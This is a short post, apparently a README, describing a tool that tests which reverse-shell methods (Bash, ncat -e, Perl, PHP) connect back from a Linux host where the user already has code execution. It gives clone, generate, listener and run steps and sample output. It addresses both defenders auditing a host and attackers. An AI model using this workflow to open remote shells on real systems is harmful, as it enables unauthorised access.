Why?
You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.
When?
You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.
How?
- Clone the repo:
git clone https://github.com/fx2301/reverseshellenum.git cd reverseshellenum - Generate yourself a fresh script:
LHOST="10.10.0.123" LPORT=31373 python3 generate.py - Run the listener:
./listen.sh - Run the reverse shell enumerator on the target host:
./reverseshellenum.sh - Observe which shells work (refer to shells.json):
$ ./listen.sh [i] Starting Reverse Shell Audit [+] Success: Bash -i [+] Success: Bash 196 [+] Success: Bash read line [+] Success: Bash 5 [+] Success: ncat -e [+] Success: Perl [+] Success: Perl no sh [+] Success: PHP Emoji [i] Ending Reverse Shell Audit PR's welcome! Kudos to revshells.com for the raw material.
Top comments (0)